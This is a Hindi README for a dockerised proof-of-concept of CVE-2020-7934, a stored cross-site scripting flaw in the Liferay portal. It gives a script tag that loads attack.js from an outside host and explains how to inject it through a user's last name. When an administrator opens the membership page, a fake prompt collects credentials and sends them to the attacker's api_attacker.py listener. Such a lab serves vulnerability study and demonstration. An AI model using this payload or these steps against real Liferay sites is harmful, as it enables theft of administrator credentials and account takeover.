CVE 2020-7934
CVE कैसे चलाएं
आवश्यकताएँ
- docker
टिप्पणियाँ
हमले की स्क्रिप्ट को ऑनलाइन रखना संभव है (js कोड दिया गया है) http://yourjavascript.com/
हमारी Js स्क्रिप्ट हमले के लिए ऑनलाइन
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
कॉन्फ़िगरेशन के लिए कमांड
- इस प्रोजेक्ट की रूट फ़ोल्डर में जाएं
- "sudo docker-compose up --build" चलाएं
- नया टर्मिनल: "docker inspect liferay" चलाएं ==> और IPAddress मान कॉपी करें
- नया टर्मिनल: "python api_attacker.py" चलाएं
- ब्राउज़र खोलें और "http://IPAddress:8080" पर जाएं ==> आपको liferay पोर्टल प्रतिक्रिया के रूप में मिलना चाहिए
- कंटेनर रोकने और हटाने के लिए "sudo docker-compose rm" का उपयोग करें
हमले के निर्देश
- liferay में एक उपयोगकर्ता के रूप में पंजीकरण करें, लॉग इन करें, और "उपलब्ध साइट्स" अनुभाग में, "liferay" साइट में शामिल हों।
- JS स्क्रिप्ट में "अंतिम नाम" बदलें (सीधे () या "src =" http ... "" के माध्यम से)
- liferay व्यवस्थापक के रूप में लॉग इन करें (उपयोगकर्ता नाम: [email protected], पासवर्ड: test)
- उपलब्ध साइट्स पर जाएं और "liferay" पर क्लिक करें, इस साइट का सार्वजनिक पृष्ठ खुल जाएगा।
- नए पृष्ठ पर जाएं, दाईं ओर एक मेनू खुलेगा, सदस्यता पर क्लिक करें।
- चरण 1 में पंजीकृत उपयोगकर्ता का चयन करें। उस समय स्क्रिप्ट निष्पादित हो जाएगी।
5.1) स्क्रिप्ट attack.js में पृष्ठ क्रेडेंशियल्स मांगेगा।
- चरण 5 (कॉन्फ़िगरेशन के कमांड का) के टर्मिनल में 5.1 में डाले गए उपयोगकर्ता नाम/पासवर्ड मुद्रित होंगे (व्यवस्थापक द्वारा)